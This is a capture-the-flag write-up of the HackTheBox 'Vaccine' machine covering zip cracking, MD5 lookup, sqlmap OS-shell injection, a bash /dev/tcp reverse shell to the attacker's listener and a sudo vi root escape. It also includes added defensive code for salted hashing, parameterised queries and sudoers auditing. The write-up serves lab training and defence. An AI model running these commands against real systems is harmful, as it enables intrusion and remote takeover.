
HackTheBox [Vaccine] WriteUp


GetShell

A port scan shows three services open: 21 (FTP), 22 (SSH) and 80 (HTTP).

Start with FTP: the anonymous user can download a backup.zip. The archive is password-protected, so it has to be cracked first. fcrackzip can crack it directly, or you can extract the hash and crack it with hashcat.

brew install fcrackzip
fcrackzip -D -p top1000.txt backup.zip

The password cracks to 741852963. The archive contains the website source code, which includes a username and an unsalted MD5 password hash, 2cb42f8734ea607eefed3b70af13bbd3. Looking it up on CMD5 gives the plaintext qwerty789.
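The reason a lookup service recovers the plaintext is that an unsalted, fast hash maps each password to one fixed digest that can be precomputed. The following Python is an added example (not code from the box or the author) that puts the weak scheme next to a hardened one: a per-user random salt, a slow KDF (PBKDF2-HMAC-SHA256 from the standard library) and a constant-time comparison. The record format `pbkdf2_sha256$<iters>$<salt>$<digest>` is my own convention, and the iteration count follows the OWASP Password Storage Cheat Sheet recommendation.

```python
import hashlib
import hmac
import os
from typing import Optional

# --- The weak scheme found in the site source: an unsalted MD5 digest stored as the password ---
def md5_store(password: str) -> str:
    """Unsalted MD5: identical passwords give identical digests, so a stored
    digest can be looked up in a precomputed table (which is what CMD5 does)."""
    return hashlib.md5(password.encode()).hexdigest()

def md5_verify(password: str, stored: str) -> bool:
    # Plain == is also not constant-time; a secondary weakness next to the missing salt.
    return md5_store(password) == stored

# --- Hardened replacement: per-record random salt, slow KDF, constant-time compare ---
ITERATIONS = 600_000   # OWASP's recommended work factor for PBKDF2-HMAC-SHA256

def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record 'pbkdf2_sha256$<iters>$<salt>$<digest>'.
    The salt is fresh per record, so two users with the same password store
    different values and precomputed tables are useless."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; reject malformed records."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))

if __name__ == "__main__":
    # The page's recovered plaintext against the hash from the site source.
    print(md5_verify("qwerty789", "2cb42f8734ea607eefed3b70af13bbd3"))   # True
    rec1, rec2 = pbkdf2_store("qwerty789"), pbkdf2_store("qwerty789")
    # Same password, two different records; only the right password verifies.
    print(rec1 != rec2, pbkdf2_verify("qwerty789", rec1), pbkdf2_verify("qwerty798", rec1))   # True True False
```

The hardened record stores its own parameters, so the iteration count can be raised later without breaking existing users: verify with the stored count, then re-store with the new one on a successful login.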

Visit the website and log in with the username and password just recovered. The dashboard's search parameter is SQL-injectable: http://10.129.95.174/dashboard.php?search=a.

Feed the URL to sqlmap to get a shell directly.

sqlmap -u http://10.129.95.174/dashboard.php?search=a --cookie="PHPSESSID=79gpf5gqu90fnsjld3okq61vgd" --os-shell
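What makes the search parameter exploitable is that the PHP code pastes the user's term straight into the SQL text, so a quote in the input closes the string literal and the remainder is parsed as SQL. The following Python is an added example, not the box's dashboard.php: it uses an in-memory SQLite table as a stand-in for carsdb (the table name, columns and rows are constructed) and shows the concatenated query next to the parameterised one that fixes it. In PHP with PostgreSQL the parameterised equivalent is pg_query_params().

```python
import sqlite3

def make_db():
    """Constructed stand-in for the dashboard's database; the schema is made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT, fuel TEXT, engine TEXT)")
    conn.executemany(
        "INSERT INTO cars VALUES (?, ?, ?, ?)",
        [("Elixir", "Sports", "Petrol", "2000cc"),
         ("Sandy", "Sedan", "Petrol", "1000cc"),
         ("Meteor", "Hatchback", "Diesel", "800cc")],
    )
    return conn

def search_vulnerable(conn, term):
    """The injectable pattern: the search term becomes part of the SQL text."""
    sql = f"SELECT name FROM cars WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]

def search_safe(conn, term):
    """Parameterised form: the term is bound as a value and can never be parsed as SQL."""
    sql = "SELECT name FROM cars WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]

# Constructed test input: a quote that ends the literal, then an always-true clause.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("normal term, vulnerable:", search_vulnerable(db, "San"))   # ['Sandy']
    print("normal term, safe:      ", search_safe(db, "San"))         # ['Sandy']
    # The vulnerable query becomes  ... WHERE name LIKE '%' OR '1'='1%'  and returns every row;
    # the safe query looks for a name containing the literal text and returns nothing.
    print("tautology, vulnerable:  ", search_vulnerable(db, TAUTOLOGY))
    print("tautology, safe:        ", search_safe(db, TAUTOLOGY))      # []
```

The two functions behave identically on ordinary input, which is why this class of bug survives functional testing; only the parameterised form keeps the query's structure fixed regardless of what the user sends.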

Start nc locally to listen on a port.

nc -vl 9443

In sqlmap's os-shell, run the following command to send a reverse shell back to the listener.

bash -c "bash -i >& /dev/tcp/10.10.14.128/9443 0>&1"

This yields a shell as the postgres user.

Privilege Escalation

At this point a shell is available, but the postgres user's password is unknown, so sudo -l cannot be run to list the current user's sudo privileges.

Reading the website source with cat /var/www/html/dashboard.php reveals the PostgreSQL connection string:

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

Logging in over SSH with this username and password succeeds. Running sudo -l shows one permitted command:

/bin/vi /etc/postgresql/11/main/pg_hba.conf

GTFOBins lists vi as usable for privilege escalation when it runs under sudo, because the editor can spawn a shell.

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell

This drops directly into a root shell; collect the flags.

cat /var/lib/postgresql/user.txt
cat /root/root.txt
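The sudo rule above is the root cause of the escalation: a sudo grant for an editor or pager is a root shell in disguise, because such programs can run a shell from inside. The intended mechanism for letting a user edit one privileged file is sudoedit, which copies the file to a temp location, runs the editor as the invoking user, and copies the result back, so a shell escape gains nothing. The Python below is an added example (not code from the box or the author) of a sudoers audit that flags such rules and proposes the sudoedit form; the sudoers excerpt is constructed, its first rule mirrors what sudo -l showed, and the set of editor-like binaries is illustrative rather than exhaustive.

```python
import os
import re

# Editors and pagers that can spawn a shell from inside the program (the class of
# binary GTFOBins documents). Illustrative, not exhaustive.
EDITOR_LIKE = {"vi", "vim", "view", "nano", "pico", "ed", "ex", "emacs", "less", "more", "man"}

# user_or_group  host = (runas)  TAG: command, command, ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

def audit_sudoers(text: str):
    """Return one finding per sudo rule that amounts to an unrestricted root shell."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            tokens = cmd.split()
            if not tokens:
                continue
            exe = os.path.basename(tokens[0])
            if exe == "ALL":
                findings.append({"line": lineno, "user": m.group("user"), "command": cmd,
                                 "reason": "unrestricted command list",
                                 "fix": "enumerate the exact commands needed"})
            elif exe in EDITOR_LIKE:
                target = tokens[1] if len(tokens) > 1 else "<file>"
                findings.append({"line": lineno, "user": m.group("user"), "command": cmd,
                                 "reason": f"{exe} can escape to a shell",
                                 "fix": f"sudoedit {target}"})
    return findings

# Constructed sudoers excerpt; the first rule matches what sudo -l showed on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset
# editor rule: a root shell in disguise
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx
dba      ALL=(root) sudoedit /etc/postgresql/11/main/pg_hba.conf
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['user']}: {f['command']!r}: {f['reason']}; use: {f['fix']}")
```

Only the vi rule is reported; the systemctl rule names fixed commands and the dba rule already uses sudoedit. On the box, replacing the vi grant with the sudoedit form would have let the postgres user keep editing pg_hba.conf without any route to a root shell.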